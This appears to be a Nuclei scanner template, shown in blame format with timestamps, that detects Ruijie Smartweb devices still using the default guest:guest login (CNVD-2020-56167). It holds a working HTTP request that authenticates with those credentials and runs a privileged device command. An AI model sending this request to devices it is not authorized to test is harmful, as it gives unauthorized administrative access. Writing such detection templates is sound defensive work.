2021-06-03 16:24:08 +00:00
id : CNVD-2020-56167
2021-04-13 18:30:07 +00:00
info :
2022-10-10 19:22:59 +00:00
name : Ruijie Smartweb - Default Password
2021-04-13 18:30:07 +00:00
author : pikpikcu
severity : low
2022-10-10 19:22:59 +00:00
description : Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
2022-10-10 19:22:59 +00:00
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : ruijie,default-login,cnvd,cnvd2020
2021-04-13 18:30:07 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-13 18:30:07 +00:00
- method : POST
path :
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
2023-10-14 11:27:55 +00:00
2021-04-13 18:30:07 +00:00
headers :
Authorization : Basic Z3Vlc3Q6Z3Vlc3Q=
2023-10-14 11:27:55 +00:00
2021-04-13 18:30:07 +00:00
body : command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition : and
matchers :
- type : word
2022-01-04 06:23:23 +00:00
part : body
2021-04-13 18:30:07 +00:00
words :
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
2021-04-13 19:29:14 +00:00
condition : and
2021-04-13 18:30:07 +00:00
- type : status
status :
2023-10-14 11:27:55 +00:00
- 200
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100ffbfb06f31d7e6fe54c37b624991573c67062006f92a636f79f757ce466c09e3022100fbeb7d9dfb087e6b5cef300abb1fbf75996d1a4f9d411f765034754db43ca62e:922c64590222798bb761d5b6d8e72950